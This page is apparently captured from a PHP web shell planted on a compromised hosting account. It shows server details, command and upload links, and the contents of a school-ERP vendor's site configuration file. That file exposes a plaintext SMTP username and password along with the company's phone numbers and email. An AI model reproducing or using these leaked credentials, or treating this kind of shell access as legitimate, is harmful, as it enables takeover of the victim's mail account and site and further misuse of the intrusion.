|
Server IP : 2a02:4780:3:2287:0:3736:a38e:8 / Your IP : 216.73.216.63 Web Server : LiteSpeed System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.54.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 6 18:03:03 EDT 2026 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : system, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0777) : /home/u926327694/domains/smsoft.in/public_html/demo/src/../Management/../../help/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
define('SITE_NAME', 'E Vision Infotech');
define('SITE_TITLE', 'Smart Campus Management ERP for Schools & Colleges');
define('SITE_URL', 'https://www.evisioninfotech.com');
define('COMPANY_NAME', 'E Vision Infotech');
define('COMPANY_TAGLINE', 'Smart Campus Management');
define('EMAIL', 'e.vision.infotech@gmail.com');
define('PHONE', '+91 8050482213');
define('PHONE_ALT', '+91 895118260');
define('ADDRESS', 'Navanagar, Hubli, Karnataka, India');
// SMTP Configuration
define('SMTP_HOST', 'smtp.hostinger.com');
define('SMTP_PORT', 465);
define('SMTP_USERNAME', 'info@smsoft.in');
define('SMTP_PASSWORD', '805048@Rr');
define('SMTP_FROM_EMAIL', 'info@smsoft.in');
define('SMTP_FROM_NAME', 'E Vision Infotech');
define('DEFAULT_META_DESC', 'E Vision Infotech provides comprehensive school management software ERP for schools and colleges. Manage attendance, fees, exams, and more with our all-in-one solution.');
define('DEFAULT_KEYWORDS', 'school management software, college ERP, education software, student management, attendance tracking, fee management');
$social_links = [
'facebook' => '#',
'youtube' => '#',
'instagram' => '#'
];
$pricing_plans = [
[
'name' => 'Finance Plan',
'price' => '60',
'features' => [
'Basic Student Info',
'Fees Management',
'Income & Expenses',
'Inventory Management',
'Reports',
'WhatsApp SMS Support',
'Mon-Fri Support'
]
],
[
'name' => 'Standard Plan',
'price' => '70',
'features' => [
'Finance Management',
'Student Management',
'Attendance',
'Reports',
'WhatsApp SMS Support',
'Additional Modules',
'Mon-Fri Support'
]
],
[
'name' => 'Premium Plan',
'price' => '85',
'features' => [
'All Finance Modules',
'All Student Modules',
'Student Android App',
'Certificate & Exam Management',
'Communication Management',
'Unlimited WhatsApp SMS',
'24/7 Support'
]
],
[
'name' => 'Enterprise Plan',
'price' => '100',
'features' => [
'All Finance Modules',
'All Student Modules',
'Biometric Integration',
'Custom Android App',
'All Modules Included',
'Unlimited WhatsApp SMS',
'24/7 Priority Support'
]
]
];
$software_modules = [
['name' => 'Finance', 'desc' => 'Manage budgets, fees, expenses, and financial reporting efficiently'],
['name' => 'Student', 'desc' => 'Track student data, attendance, performance, and activities'],
['name' => 'Exam', 'desc' => 'Schedule exams, track performance, and analyze results'],
['name' => 'Staff', 'desc' => 'Manage payroll, attendance, roles, and performance'],
['name' => 'Library', 'desc' => 'Organize book inventory, checkouts, and returns'],
['name' => 'Student App', 'desc' => 'Mobile access to attendance, grades, and communication'],
['name' => 'Others', 'desc' => 'Transportation, Hostel, Certificate, and CMS']
];
$services = [
['icon' => 'laptop-code', 'title' => 'Web Development', 'desc' => 'Custom websites that enhance your brand identity with responsive, user-friendly interfaces'],
['icon' => 'server', 'title' => 'Hosting Services', 'desc' => 'Secure, reliable hosting ensuring optimal performance and uptime for your applications'],
['icon' => 'bullhorn', 'title' => 'Digital Marketing', 'desc' => 'Increase visibility, attract students, and effectively engage your community'],
['icon' => 'comments', 'title' => 'WhatsApp Communication', 'desc' => 'Keep parents informed and engaged with automated messaging'],
['icon' => 'mobile-alt', 'title' => 'Android Apps', 'desc' => 'Easy access to services, updates, and communication from any device'],
['icon' => 'headset', 'title' => '24/7 Support', 'desc' => 'Round-the-clock customer care for uninterrupted service']
];
function getActivePage($page) {
global $current_page;
return $current_page === $page ? 'aria-current="page"' : '';
}